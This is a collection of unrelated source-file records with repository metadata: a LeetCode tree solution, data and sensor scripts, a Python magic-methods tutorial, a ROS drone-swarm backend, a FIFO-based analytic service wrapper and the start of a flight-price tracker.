10715d27aa4f7e90889e6c3656f863943f5b87a0 | 04ae1836b9bc9d73d244f91b8f7fbf1bbc58ff29 | /404/Solution.py | fc03385d6cf998b49aa9ceaf42511cad45ba0ca5 | [] | no_license | zhangruochi/leetcode | 6f739fde222c298bae1c68236d980bd29c33b1c6 | cefa2f08667de4d2973274de3ff29a31a7d25eda | refs/heads/master | 2022-07-16T23:40:20.458105 | 2022-06-02T18:25:35 | 2022-06-02T18:25:35 | 78,989,941 | 14 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,489 | py | """
Find the sum of all left leaves in a given binary tree.
Example:
3
/ \
9 20
/ \
15 7
There are two left leaves in the binary tree, with values 9 and 15 respectively. Return 24.
"""
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def sumOfLeftLeaves(self, root):
"""
:type root: TreeNode
:rtype: int
"""
def iter(root,isleaft):
if not root:
return 0
elif not root.left and not root.right and isleaft:
return root.val
else:
return iter(root.left,True) + iter(root.right,False)
return iter(root,False)
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def sumOfLeftLeaves(self, root: TreeNode) -> int:
res = 0
def traverse(root,flag):
nonlocal res
if not root:
return
if not root.left and not root.right and flag:
res += root.val
traverse(root.left,1)
traverse(root.right,0)
traverse(root,0)
return res
| [
"zrc720@gmail.com"
] | zrc720@gmail.com |
cb6228db4a6daadd3dacd0051ad891abbe1a94fe | d3cb0b5c54034b956b35dd211db2549f362ba6bf | /length.py | 292aaad2b00c07775a9c71961102443b9aae00f4 | [
"Apache-2.0"
] | permissive | eva-koester/hackathon_tunnel | 305668d1f938e4f60f3fedc1fa1f61629540f562 | 85f34e1568fa1de166164ca96958b9bc20086ace | refs/heads/master | 2020-04-02T02:20:59.992995 | 2018-10-22T18:11:02 | 2018-10-22T18:11:02 | 153,891,808 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | import json
import matplotlib.pyplot as plt
from geopandas import GeoDataFrame
df = GeoDataFrame.from_file("Tunnel/MapInfoRelationen/tunnel.MIF")
print(df.columns)
print(df.laenge)
print(type(df))
print(df.laenge.sum())
print(df.laenge.min())
print(df.laenge.max())
print(df.laenge.median())
print(df.bezeichnung.nunique())
hist = df.laenge.hist(bins=25)
plt.show()
| [
"eva.maria.koester@gmx.de"
] | eva.maria.koester@gmx.de |
11536b5271ae3d430e3c66740a0fa2cbea21f19b | 0089e87d4e9bef9df4fe6611a79a13225c01b98e | /mB3-python-03/script-b0307-01.py | e9ade0c7dc5e3463fdb7dbdf2ba8361e5a78fbb1 | [] | no_license | odvk/sf-pyfullstack-c02 | 63ea99bf6bea79113fe75e0e6f4e5cdfb4a90aca | 4521b9652264d03c082a9390dbcdcec2586c8fd1 | refs/heads/master | 2020-06-25T06:48:50.944156 | 2019-08-17T06:08:02 | 2019-08-17T06:08:02 | 199,236,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,128 | py | # В3.7 Ещё раз про “магические” методы
class User:
def __init__(self):
print("Конструирую пользователя")
self.name = "Гелиозавр"
# конструктор это функция определяемая внутри класса;
# конструктор называется __init__ (два подчёркивания с двух сторон от названия);
# конструктор это функция: есть формальный аргумент, который называется 'self';
# внутри конструктора фактический аргумент self можно использовать чтобы изменять поля манипулируемого объекта.
u1 = User()
u2 = User()
u2.name = "Орнитишийлар"
print(u1.name, u2.name)
print("----------------------------")
# В нашем случае мы хотим сделать так, чтобы когда User участвует в выражении как строка
# (то есть приводится к строке) использовалось поле name. Это делается таким кодом:
class User1:
def __init__(self):
print("Конструирую пользователя")
self.name = "Гелиозавр"
def __str__(self):
return self.name
u1 = User1()
print(u1)
print("----------------------------")
# Дополним нашу модель пользователя и перепишем немного определение класса:
class User2:
def __init__(self, email, name="Гелиозавр"):
self.email = email
self.name = name
def __str__(self):
return "%s <%s>" % (self.name, self.email)
u1 = User2("test@example.com")
u2 = User2(name="Орнитишийлар", email="zakusi@pet.ru")
print(u1, u2)
print("----------------------------")
# Обратите внимание, что некоторые примеров в таблице выше используют два аргумента,
# так как они описывают какое-то парное действие. К примеру, мы в нашем сервисе можем считать,
# что если у нас есть два пользователя с одинаковым е-мейлом, то это два равных пользователя.
# Чтобы использовать эту проверку в коде мы определим наш класс пользователя так:
class User3:
def __init__(self, email, name="Гелиозавр"):
self.email = email
self.name = name
def __str__(self):
return "%s <%s>" % (self.name, self.email)
def __eq__(self, other):
return self.email.lower() == other.email.lower()
u1 = User3(name="Гелиозавр", email="RAWR@mail.ru")
u2 = User3(name="Орнитишийлар", email="rawr@mail.ru")
print(u1, u2)
print("Это один и тот же пользователь?", u1 == u2)
| [
"kustov.dv@gmail.com"
] | kustov.dv@gmail.com |
d4aee2bbb05e098682209381c146640801f79e1b | 1c945dcc6f525de77245586ea32dac11ccd04208 | /src/server/config.py | 8cbce389829ed4e436b32f5e2eba5a866a590493 | [] | no_license | FeverTeam/CloudSlides-Win_python | c009606de38f12e0ee95ebd84e84158d40f90e0c | 6b7b4ca0bdc2b4562a55c471bd8c75d236bec695 | refs/heads/master | 2021-01-24T06:12:47.668042 | 2014-06-08T10:48:48 | 2014-06-08T10:48:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | # -*- coding: UTF-8 -*-
#mongoDB config
MONGO_SVRIP = "127.0.0.1"
MONGO_SVRPORT = 27017
MONGO_PPTDB = 'LivePPT-PPT'
MONGO_IMGDB = 'LivePPT-Img'
#redis config
REDIS_SVRIP = "127.0.0.1"
REDIS_SVRPORT = 6379
PPT_CONVERT_REQMQ = 'LivePPT-Convert-ReqMq'
PPT_CONVERT_RESPMQ = 'LivePPT-Convert-RespMq'
UTF8_ENCODING = "UTF-8"
POWERPOINT_APPLICATION_NAME = "PowerPoint.Application"
| [
"itzijing@gmail.com"
] | itzijing@gmail.com |
b9e21fc786f1b4294411835f09300d55ac07eea1 | b351c11aa3d9ae637bb60571d54005407a031079 | /data_logging/light_and_temperature.py | 9f0399150f248ddcc2af3c40e53aefa83d98fba3 | [] | no_license | VectorSpaceHQ/Intermediate-Raspberry-Pi-Workshop | e0909202356997f4605facc4556a2c71ba462497 | 8c88d85d0194956576970f7a2b8495d0d6eff0d9 | refs/heads/master | 2020-12-03T23:55:38.822778 | 2016-08-28T17:29:47 | 2016-08-28T17:29:47 | 66,735,473 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | #!/usr/bin/env python3
from w1thermsensor import W1ThermSensor
from gpiozero import LightSensor
from time import sleep
tempSensor = W1ThermSensor()
lightSensor = LightSensor(18, charge_time_limit=0.05)
while True:
temperature = tempSensor.get_temperature(W1ThermSensor.DEGREES_F)
light = lightSensor.value
print ('Light: %0.2f, Temperature %0.2f' % (light, temperature))
sleep(1)
| [
"jordan.goulder@gmail.com"
] | jordan.goulder@gmail.com |
8ee6093eaceb409bed04cc2f2521ef05d60abf34 | e5d993c9896b9691b3d1981c1eda13f13bd3ee42 | /preFinal/backend2.py | 50fc587f59dd2eaac5cdec5e90216fe7228ba411 | [] | no_license | mario8th/CompiledHive | 2af4bf88837edac8d0793a953122a7761d4e9d11 | b7190a8a5627385d45eb7ea637ae437d1425082c | refs/heads/master | 2020-04-19T08:33:32.335467 | 2019-04-30T03:58:30 | 2019-04-30T03:58:30 | 168,081,255 | 1 | 2 | null | 2019-04-18T06:09:01 | 2019-01-29T03:18:21 | Python | UTF-8 | Python | false | false | 12,218 | py | #!/usr/bin/env python
import numpy as np
import time
import rospy
import ast
from std_msgs.msg import String
from gui_ver2 import *
import math
import importlib
WARNDRONERADIUS = 0.2
STOPDRONERADIUS = 0.1
ERRORMARGIN = 0.0
backend = None
visualizationPub = rospy.Publisher('backtomonitorvis', String, queue_size=10)
consolePub = rospy.Publisher('backtomonitorconsole', String, queue_size=10)
destPub = rospy.Publisher('backtosim', String, queue_size=10)
visPubObstacle = rospy.Publisher('backtomonitorobstacles', String, queue_size=10)
visPubSensor = rospy.Publisher('backtomonitorsensors', String, queue_size=10)
visPubConfig = rospy.Publisher('backtomonitorconfig', String, queue_size=10)
logFile = ""
class BackendData:
def __init__(self, fullDroneList, destDict, pathDict, obstDict, visConfig, logConfig):
# Static Data
# Official drone order
self.fullDroneList = fullDroneList
# Path information
self.destDict = destDict
self.pathDict = pathDict
# obstacles and sesnsors
self.obstDict = obstDict
self.sensors = [[4.0,-4.0,0.0], [-4.0,-4.0,0.0], [4.0,4.0,0.0], [-4.0,4.0,0.0], [4.0,-4.0,8.0], [-4.0,-4.0,8.0], [4.0,4.0,8.0], [-4.0,4.0,8.0]]
# Config files
self.visConfig = visConfig
self.logConfig = logConfig
# Tracks major error occurence
self.quitBool = False
# Start locations
self.startLocations = []
pathDrones = 1.0
for drone in fullDroneList:
if drone in self.destDict:
self.startLocations.append(self.destDict[drone][0])
else:
self.startLocations.append([pathDrones, 2.0, 0.0])
pathDrones = round(pathDrones + 0.3, 2)
# Tracks current dest for each drone
self.destIndexDict = {}
for drone in self.destDict:
self.destIndexDict[drone] = 0
# Start drones at start locations
self.currentLocations = self.startLocations
self.currentDests = self.startLocations
# Import all flight path files
self.importDict = {}
for file in self.pathDict:
self.importDict[file] = importlib.import_module(file)
# Methods that check for events and return report strings
def checkForEvents(self):
self.checkObstacleCollide()
self.checkOutOfBounds()
self.checkDronesClose()
# Checks if Drones are within collision radius
def checkDronesClose(self):
for droneCount1, drone1 in enumerate(self.currentLocations):
for droneCount2, drone2 in enumerate(self.currentLocations):
if(droneCount1 < droneCount2):
#Compare distances
dist = (((drone1[0] - drone2[0]) * (drone1[0] - drone2[0])) +
((drone1[1] - drone2[1]) * (drone1[1] - drone2[1])) +
((drone1[2] - drone2[2]) * (drone1[2] - drone2[2])))
dist = math.sqrt(dist)
#Check for potential drone collision
if(dist < STOPDRONERADIUS):
self.activateQuitBool()
logString = "Stopping: "
logString += "Drone " + str(self.fullDroneList[droneCount1]) + " and Drone " + str(self.fullDroneList[droneCount2])
logString += " within stop radius"
self.toLog('E', logString)
elif(dist < WARNDRONERADIUS):
logString = "Caution: "
logString += "Drone " + str(self.fullDroneList[droneCount1]) + " and Drone " + str(self.fullDroneList[droneCount2])
logString += " within warning radius"
self.toLog('E', logString)
# Checks if a drone is within an obstacle
def checkObstacleCollide(self):
errorFlag = False
for obstacle in self.obstDict:
for drone in self.currentLocations:
if(pointWithinRectangle(drone, self.obstDict[obstacle][0], self.obstDict[obstacle][1])):
logString = str(drone) + ' in obstacle ' + str(obstacle)
self.toLog('E', logString)
# Checks if drone is out of bounds
def checkOutOfBounds(self):
#Find 2 opposite Sensors
sensor1 = self.sensors[0]
sensor2 = self.sensors[-1]
for sensor in self.sensors:
if(sensor1[0] != sensor[0] and sensor1[1] != sensor[1] and sensor1[2] != sensor[2]):
sensor2 = sensor
# Feed each drone into pointWithinRectangle
errorFlag = False
for drone in self.currentLocations:
errorFlag = errorFlag or not pointWithinRectangle(drone, sensor1, sensor2)
# Drone was out of bounds
if(errorFlag):
self.activateQuitBool()
#Publish to consolePub about flight ending because a drone flew out of bounds
logString = "Drone flew out of bounds"
self.toLog('E', logString)
# Activates wuit bool and sets all drones to land
def activateQuitBool(self):
global destPub
self.quitBool = True
newDests = self.startLocations
self.currentDests = newDests
destPub.publish(str(newDests))
# Checks which drones have reached dest and updates dests accordingly
def update(self):
# Get destinations for point by point path, gets dict back
pointDests = self.getPointDests()
# Get destinations for each function path, gets dict back
functionDests = self.getFunctionDests()
# Combine dest lists, in order by self.fullDroneList
newDests = []
for drone in self.fullDroneList:
if drone in pointDests:
newDests.append(pointDests[drone])
else:
newDests.append(functionDests[drone])
self.currentDests = newDests
def getPointDests(self):
pointDestDict = {}
for droneCount, drone in enumerate(self.fullDroneList):
if drone in self.destDict:
# Test location against destination
if(calcDistance(self.currentLocations[droneCount], self.currentDests[droneCount]) <= ERRORMARGIN):
# Drone within error margin, move to next to next destination
# Update Destination index
if(len(self.destDict[drone]) <= self.destIndexDict[drone] + 1):
self.destIndexDict[drone] = self.destIndexDict[drone]
else:
self.destIndexDict[drone] = self.destIndexDict[drone] + 1
pointDestDict[drone] = self.destDict[drone][self.destIndexDict[drone]]
return pointDestDict
def getFunctionDests(self):
pathDestDict = {}
# for each flight path
for path in self.pathDict:
# Package all drone locations for that path into one list
paramLocations = []
for drone in self.pathDict[path]:
paramLocations.append(self.currentLocations[self.fullDroneList.index(drone)])
# Send list to function and recieve new destinations
print path
newDests = self.importDict[path].flightPath(paramLocations)
# Reassemble lists into single dictionary
for droneCount, drone in enumerate(newDests):
pathDestDict[self.pathDict[path][droneCount]] = drone
return pathDestDict
def toLog(self, commandLetter, logString):
global logFile
# Take in command + string
# Test command against Config
# if logging that command, log
print logString
# Test if logging
if(self.logConfig[0]):
# Open File to log
log = open(logFile, 'a')
# Test for events and logging config for events
if(commandLetter == 'E' and self.logConfig[7]):
log.write(logString + "\n")
consolePub.publish(logString)
elif(commandLetter == 'L' and self.logConfig[2]):
log.write(logString + "\n")
log.close()
# Tests if point is within rectangle bounded by 2 opposite corners
def pointWithinRectangle(point, corner1, corner2):
withinRect = True
# Check X values within range
for xyzIndex in range(3):
if((point[xyzIndex] >= corner1[xyzIndex] and point[xyzIndex] <= corner2[xyzIndex]) or (point[xyzIndex] <= corner1[xyzIndex] and point[xyzIndex] >= corner2[xyzIndex])):
pass
else:
withinRect = False
return withinRect
# Forwards drone locations to vis
def forwardDroneLocs():
global backend, visualizationPub
visualizationPub.publish(str(backend.currentLocations))
def receivedLocations(data):
global backend, visualizationPub, destPub, consolePub
# Update currentlocs in backend
backend.currentLocations = ast.literal_eval(data.data)
backend.toLog('L', str(backend.currentLocations))
# Forward drone locations to vis
forwardDroneLocs()
backend.checkForEvents()
if(not backend.quitBool):
# Do calculations based on new locations, building new destinations
backend.update()
#Send destinations to sim
destPub.publish(str(backend.currentDests))
#
def receivedEStop(data):
global backend
# Publish receipt of Estop to console
backend.activateQuitBool()
def calcDistance(point1, point2):
dist = 0
dist += ((point1[0] - point2[0]) * (point1[0] - point2[0]))
dist += ((point1[1] - point2[1]) * (point1[1] - point2[1]))
dist += ((point1[2] - point2[2]) * (point1[2] - point2[2]))
return math.sqrt(dist)
def runBackend(fullDroneList, destDict, pathDict, obstDict, visConfig, logConfig):
# Get global publishers
global backend, visualizationPub, destPub, consolePub, visPubObstacle, visPubSensor, visPubConfig
# Initialize backend data
backend = BackendData(fullDroneList, destDict, pathDict, obstDict, visConfig, logConfig)
# Setup subscribers + ros stuff
rospy.init_node('backend', anonymous=True)
# Parse and publish obstacles and sensors to visualization to Initialize
obstaclePacket = []
for obstacleKey in obstDict:
obstaclePacket.append(obstDict[obstacleKey])
# Publish obstacles to initialize
visPubObstacle.publish(str(obstaclePacket))
visPubObstacle.publish(str(obstaclePacket))
time.sleep(0.1)
visPubObstacle.publish(str(obstaclePacket))
visPubObstacle.publish(str(obstaclePacket))
# Publish start locations to initialize
destPub.publish(str(backend.currentDests))
destPub.publish(str(backend.currentDests))
time.sleep(0.1)
destPub.publish(str(backend.currentDests))
destPub.publish(str(backend.currentDests))
visPubConfig.publish(str(visConfig))
visPubConfig.publish(str(visConfig))
time.sleep(0.1)
visPubConfig.publish(str(visConfig))
visPubConfig.publish(str(visConfig))
rospy.Subscriber('simtoback', String, receivedLocations)
rospy.Subscriber('monitortoback', String, receivedEStop)
rospy.spin()
def main():
global logFile
# Launch GUI to gather user input
flightData = launchGui()
print flightData
logFile = flightData[6]
# Parse user input
fullDroneList = []
# Dest list
for drone in flightData[0]:
fullDroneList.append(drone)
# Path list
for path in flightData[2]:
fullDroneList.extend(flightData[2][path])
runBackend(fullDroneList, flightData[0], flightData[2], flightData[3], flightData[4], flightData[5])
'''runBackend([2,1,3,4],
{ 2:[[2.0,-2.0,0.0],[2.0,-2.0,3.0],[-2.0,-2.0,3.0],[-2.0,2.0,3.0],[2.0,2.0,3.0],[1.0,1.0,1.0]],1:[[-4.0,-4.0,0.0],[-4.0,-4.0,5.0],[4.0,-4.0,5.0],[4.0,4.0,5.0],[-4.0,4.0,5.0],[1.0,1.0,1.0]]},
{"loopout": [3,4]},
{'object_0': ((1.0, 2.0, 1.0), (3.0, 3.0, 3.0))},
[True, 1,1,1,1,1],
[True, True, True, 2.0, True, False, False, True])'''
if __name__ == "__main__":
main()
# I want space
| [
"noreply@github.com"
] | mario8th.noreply@github.com |
c83201eb3b362d3fa7671149eb4f863aa7a5601b | 8c66bb75d4710ad3eb5ce9760ccc0d1fcb31605e | /python/medifor/v1/fifoconn.py | 912c39478af8850dfab65673afd3d15cb1e9a096 | [
"Apache-2.0"
] | permissive | xkortex/medifor | a53a093ca0d05a2e2a72f76ef9515ee699c4b387 | 484590bfa55671917a83c5c3b507b8c9ca3c423a | refs/heads/master | 2020-11-26T01:13:50.921745 | 2020-05-05T21:44:15 | 2020-05-05T21:44:15 | 228,918,250 | 0 | 0 | Apache-2.0 | 2019-12-18T20:41:33 | 2019-12-18T20:41:32 | null | UTF-8 | Python | false | false | 12,540 | py | #!/usr/bin/env python3
"""fifoconn.py
This can be imported as a library, to make use of FIFOConn, which allows for
simple sending of text or JSON messages to a FIFO service that expects
values as indicated below. To use the FIFOConn, use this file as an example,
or you can make your own:
#!/usr/bin/env python
input = vars().get('raw_input', input)
with FIFOConn() as fconn:
print("service input: use {!r}".format(fconn.thatRecv))
print("service output: use {!r}".format(fconn.thatSend))
input("start service now, using the above FIFOs, then hit Enter")
print(fconn.communicate("hey there"))
If your service just echos what you send it, for example, then the above will
print "hey there".
You can use this to manually test your FIFO service (e.g., MATLAB, see below)
by calling, e.g.,
req = WrapRequestProto(analytic_pb2.ImageManipulationRequest(
request_id='id_foo',
out_dir='/tmp/output'))
print(fconn.communicateJSON(req))
If you just run this as a binary, this program starts an analytic service on
the given port, and then spawns a specified child process. It opens up two
named pipes with which it can communicate with the child. All analytic requests
that come into this service are forwarded to the child's "input" pipe, and all
responses are expected to come through the child's "output" pipe.
The protobuf messages are converted to JSON for the purposes of transmission,
and wrapped in a larger dict, like this for the request:
request = {
"type": "imgmanip",
"value": actual_request_dict,
}
Similarly, responses have the form:
response = {
"code": "OK",
"value": actual_response_dict,
}
The request and response values are both JSON representations of protocol
messages, as expected by the analytic protocol. The following types are allowed
in requests, with their corresponding protobuf names:
imgmanip: ImageManipulationRequest -> ImageManipulation
vidmanip: VideoManipulationRequest -> VideoManipulation
imgsplice: ImageSpliceRequest -> ImageSplice
imgcammatch: ImageCameraMatchRequest -> ImageCameraMatch
If the protobuf name is not recognized, it is used as the type name in requests.
Note that proto fields are converted from snake case (e.g., 'out_dir') to camel
case ('outDir') when converting to JSON. The conversion happens automatically,
you just need to be aware of how it works when trying to produce JSON directly.
Thus, a JSON response would use the field name 'optOut' instead of the
proto-specified 'opt_out' as per the proto3 standard.
An Example with MATLAB:
One use for this is running MATLAB code. Given MATLAB code that uses a suitable
library for communicating via the named pipes (like AnalyticService.m), you can
start your MATLAB code as a child process with this service.
Assume your main script is located in "my_analytic.m". You can start this child
process with named pipes sent in environment variables as indicated above by
issuing the following command:
./fifoconn.py -- matlab -nodisplay -nosplash -nodesktop -r my_analytic
This starts up MATLAB with the instruction to run 'my_analytic.m', and removes
all of the cruft that you don't want on the command line. Since it doesn't
specify the in_key or out_key, the names of the FIFOs are set in environment
variables in the child process, as follows:
input fifo: ANALYTIC_FIFO_IN
output fifo: ANALYTIC_FIFO_OUT
These are *from the perspective of the child process*. You can also have them
sent on the child's command line as flags, using, for example
./fifoconn.py --in_key=-in_fifo --out_key=-out_fifo -- myproc
In this example, the child will be called thus:
myproc -in_fifo <child_in_fifo_name> -out_fifo <child_out_fifo_name>
If an = suffix is specified, then flags are specified as, e.g., "--in_fifo=<name>".
In all cases, the prefix and suffix are preserved exactly. The '=' suffix
additionally consumes the space after the flag.
"""
import argparse
import json
import logging
import os.path
import select
import shlex
import shutil
import subprocess
import sys
import tempfile
import threading
import time
from google.protobuf import json_format
from medifor.v1.analyticservice import AnalyticService
# Default environment variable names through which the child process learns
# the paths of its input/output FIFOs (overridable via --in_key/--out_key).
_DEFAULT_CHILD_IN_KEY = 'ANALYTIC_FIFO_IN'
_DEFAULT_CHILD_OUT_KEY = 'ANALYTIC_FIFO_OUT'
# Maps protobuf request message names to the short 'type' tags used in the
# JSON envelope sent to the child.  Unrecognized messages fall back to their
# protobuf name (see WrapRequestProto).
_PROTO_TYPE_MAP = {
    'ImageManipulationRequest': 'imgmanip',
    'VideoManipulationRequest': 'vidmanip',
    'ImageSpliceRequest': 'imgsplice',
    'ImageCameraMatchRequest': 'imgcammatch',
}
class TimeoutError(IOError):
    """Raised when a FIFO read or write does not become ready within the timeout.

    NOTE: this intentionally shadows the Python 3 builtin ``TimeoutError``;
    within this module the name always refers to this class.
    """
    def __init__(self, op, timeout):
        # Build the message and delegate; __init__ must not return a value,
        # so the original `return super(...).__init__(...)` is dropped.
        super(TimeoutError, self).__init__(
            "timed out with op {!r} after {} seconds".format(op, timeout))
def RecvLine(f, timeout=0):
    """Block until *f* is readable (or in an exceptional state), then read one line.

    A falsy *timeout* waits indefinitely; otherwise TimeoutError is raised when
    nothing becomes ready within `timeout` seconds.
    """
    if timeout:
        ready = select.select([f], [], [f], timeout)
    else:
        ready = select.select([f], [], [f])
    if not any(ready):
        raise TimeoutError("read", timeout)
    return f.readline()
def SendLine(f, data, timeout=0):
    """Block until *f* is writable, then write *data* plus a newline and flush."""
    if timeout:
        ready = select.select([], [f], [f], timeout)
    else:
        ready = select.select([], [f], [f])
    if not any(ready):
        raise TimeoutError("write", timeout)
    f.write(data + '\n')
    f.flush()
def WrapRequestProto(req):
    """Wrap a request proto in the {'type': ..., 'value': ...} JSON envelope.

    The 'type' tag comes from _PROTO_TYPE_MAP, falling back to the raw
    protobuf message name for unrecognized request types.
    """
    proto_name = req.DESCRIPTOR.name
    envelope_type = _PROTO_TYPE_MAP.get(proto_name, proto_name)
    return {'type': envelope_type, 'value': json_format.MessageToDict(req)}
def UnwrapResponseProto(respDict, respProto):
    """Populate *respProto* from the response envelope when its code is 'OK'.

    Returns the status code string (defaults to 'UNKNOWN' when absent); the
    proto is only parsed on success.
    """
    code = respDict.get('code', 'UNKNOWN')
    if code == 'OK':
        json_format.ParseDict(respDict.get('value'), respProto)
    return code
class FIFOConn:
    """Bidirectional, line-oriented connection to a child process over two FIFOs.

    Names are from *this* process's perspective: requests go out over
    ``sendName`` and responses come back on ``recvName``.  ``thatRecv`` /
    ``thatSend`` are the same two pipes as seen by the child.
    """
    def __init__(self, pipeNames=None, timeout=0):
        self.timeout = timeout
        self.lock = threading.Lock()
        self.fifoDir = None
        if not pipeNames:
            # No names given: create a private temp dir holding both FIFOs.
            self.fifoDir = tempfile.mkdtemp()
            self.recvName = os.path.join(self.fifoDir, 'recv-child')
            self.sendName = os.path.join(self.fifoDir, 'send-child')
            os.mkfifo(self.recvName)
            os.mkfifo(self.sendName)
        else:
            self.recvName, self.sendName = pipeNames
        # The child's endpoints are the mirror image of ours.
        self.thatRecv = self.sendName
        self.thatSend = self.recvName
        # Opened lazily (see _ensureOpen): opening a FIFO blocks until the
        # peer has opened the other end.
        self.sender = None
        self.receiver = None
    def _ensureOpen(self):
        # Open both pipes on first use.  Send side first: the child mirrors
        # this order, so opening in the opposite order would deadlock.
        if not (self.sender or self.receiver):
            # TODO: add os.O_NONBLOCK, loop and sleep on OSError until timeout.
            s = os.open(self.sendName, os.O_WRONLY)
            r = os.open(self.recvName, os.O_RDONLY)
            self.sender = os.fdopen(s, 'wt')
            self.receiver = os.fdopen(r, 'rt')
    def close(self):
        # Close whichever endpoints were opened and remove the temp dir
        # (and both FIFOs) if we created one.
        with self.lock:
            if self.sender:
                self.sender.close()
            if self.receiver:
                self.receiver.close()
            if self.fifoDir:
                shutil.rmtree(self.fifoDir)
    def __enter__(self):
        return self
    def __exit__(self, *unused_exc):
        self.close()
    def communicate(self, data):
        # The lock serializes whole request/response exchanges so concurrent
        # callers can't interleave lines on the pipe.
        with self.lock:
            self._ensureOpen()
            SendLine(self.sender, data, timeout=self.timeout)
            return RecvLine(self.receiver, timeout=self.timeout)
    def communicateJSON(self, obj):
        """Send *obj* as one JSON line and return the decoded JSON response."""
        return json.loads(self.communicate(json.dumps(obj)))
def spawnChild(fconn, args, inKey=None, outKey=None):
    """Start the child process, handing it the FIFO names from *fconn*.

    *inKey*/*outKey* name either an environment variable (default) or, when
    they start with '-', a command-line flag.  A trailing '=' makes the flag
    use the single-argument "--flag=value" form.  Returns the Popen object.
    """
    if inKey is None:
        inKey = _DEFAULT_CHILD_IN_KEY
    if outKey is None:
        outKey = _DEFAULT_CHILD_OUT_KEY
    args = args[:]  # Never mutate the caller's argument list.
    env = os.environ.copy()

    def addKey(key, value):
        # Flags go on the command line; anything else becomes an env var.
        # NOTE: args are passed to Popen as a list (no shell), so values must
        # be used verbatim -- the previous shlex.quote() call made paths with
        # shell-special characters arrive at the child with literal quotes.
        if key.startswith('-'):
            if key.endswith('='):
                args.append(key + value)
            else:
                args.extend([key, value])
        else:
            env[key] = value

    addKey(inKey, fconn.thatRecv)
    addKey(outKey, fconn.thatSend)
    # Never inherit stdin (not interactive!), always inherit stdout and stderr for logging.
    return subprocess.Popen(args, env=env, stdin=subprocess.DEVNULL, stdout=None, stderr=None)
def main(args):
    """Run the gRPC analytic service, forwarding every request to the child
    process over the FIFO pair.  Returns a value suitable for sys.exit()."""
    svc = AnalyticService()
    lock = threading.Lock()
    with FIFOConn(timeout=args.resp_timeout) as fconn:
        child = spawnChild(fconn,
                           args=args.child_args,
                           inKey=args.in_key,
                           outKey=args.out_key)
        print("Child process started with PID {}".format(child.pid))
        # Fatal errors raised in gRPC handler threads are queued here (under
        # `lock`) so the polling loop below can notice them and shut down.
        fatal = []
        def communicateProtos(req, resp):
            # Shared handler for all four request types: wrap the proto into
            # the JSON envelope, round-trip it through the child, unwrap.
            try:
                reqDict = WrapRequestProto(req)
                respDict = fconn.communicateJSON(reqDict)
                code = UnwrapResponseProto(respDict, resp)
                if code == 'OK':
                    return
                if code == 'UNIMPLEMENTED':
                    raise NotImplementedError(reqDict.get("type"))
                elif code in ('UNKNOWN', 'INTERNAL'):
                    raise RuntimeError(respDict.get("value"))
                else:
                    raise RuntimeError('unknown status code {!r}: {}'.format(code, respDict))
            except IOError as e:
                if e.errno == 32: # Broken Pipe
                    with lock:
                        fatal.append(e)
                raise e
            except TimeoutError as e:
                # Timeouts are fatal because they put the fifo into an unknown
                # state for the next request.
                with lock:
                    fatal.append(e)
                raise e
        svc.RegisterImageManipulation(communicateProtos)
        svc.RegisterVideoManipulation(communicateProtos)
        svc.RegisterImageSplice(communicateProtos)
        svc.RegisterImageCameraMatch(communicateProtos)
        server = svc.Start(analytic_port=args.port)
        try:
            # Poll every 5 seconds for fatal handler errors or child exit.
            while True:
                with lock:
                    if fatal:
                        raise fatal[0]
                time.sleep(5)
                childRet = child.poll()
                # If the child exited, trigger server exit.
                if childRet is not None:
                    raise StopIteration(childRet)
        except StopIteration as e:
            print("Child exited with code {}".format(e))
            server.stop(0)
            # NOTE: this branch falls through and the function returns None,
            # which sys.exit() treats as success.
        except KeyboardInterrupt:
            print("Server stopped")
            server.stop(0)
            print("Killing child {}".format(child.pid))
            child.kill()
            return 0
        except Exception as e:
            print("Caught exception: {}".format(e))
            server.stop(0)
            print("Killing child {}".format(child.pid))
            child.kill()
            return -1
if __name__ == '__main__':
    # Command-line entry point: flags configure the service, everything after
    # '--' is the child command line (binary plus its arguments).
    parser = argparse.ArgumentParser(
        description=('Start an analytic service that spawns a child process and communicates\n'
                     'with it via temporary named pipes.'))
    parser.add_argument('--port', dest='port', type=int, default=50051,
                        help='Port to listen on for gRPC requests.')
    parser.add_argument('--in_key', dest='in_key', type=str, default=_DEFAULT_CHILD_IN_KEY,
                        help=('Name of environment variable used by the child process to find its input pipe.\n'
                              'If it starts with "-", it will be sent as a flag. Trailing "=" forces the flag\n'
                              'to use the "=" convention. The prefix and suffix are preserved as is. Examples:\n'
                              '\n'
                              '--in_key=FOO : the child gets its input pipe from env var FOO\n'
                              '--in_key=--foo : the child gets its input pipe in args, as "--foo <name>"\n'
                              '--in_key=-foo= : the child gets its input pipe in args, as "-foo=<name>"\n'))
    parser.add_argument('--out_key', dest='out_key', type=str, default=_DEFAULT_CHILD_OUT_KEY,
                        help='Name child process uses to find its output named pipe. See --in_key for format')
    parser.add_argument('--resp_timeout', dest='resp_timeout', type=float, default=0,
                        help='Maximum time to wait for a FIFO response, in floating-point seconds.')
    parser.add_argument('child_args', type=str, nargs='+',
                        help='Child command line arguments, including binary. Specify after flags using "--".')
    sys.exit(main(parser.parse_args()))
| [
"nicholasburnett@datamachines.io"
] | nicholasburnett@datamachines.io |
c3d01513d796e2b5c9677bf7d1521c455e325d50 | 194b48b62a0da2d35f2f90dadba354b682119d7b | /flights.py | 3725d1c1fbc4f8ac2a4d917155cd950a4381df45 | [] | no_license | JanAdamiak/Flights-prices-tracker | f3835c9970d62bc2375017098b424c16c0baffaa | 1f723b2ae30f1125684a6b83ad393a8929168549 | refs/heads/master | 2020-07-16T19:57:34.417496 | 2019-09-04T13:49:54 | 2019-09-04T13:49:54 | 205,857,952 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,834 | py | rapidapi_host = 'skyscanner-skyscanner-flight-search-v1.p.rapidapi.com'
# NOTE(review): API credential committed to source (redacted here).  Load it
# from an environment variable instead of hard-coding it.
rapidapi_key = '5b*************************************************d8'
def get_placeID(location):
    """Return the Skyscanner PlaceId of the top autosuggest match for *location*.

    NOTE(review): no `import requests` / `import json` is visible at the top
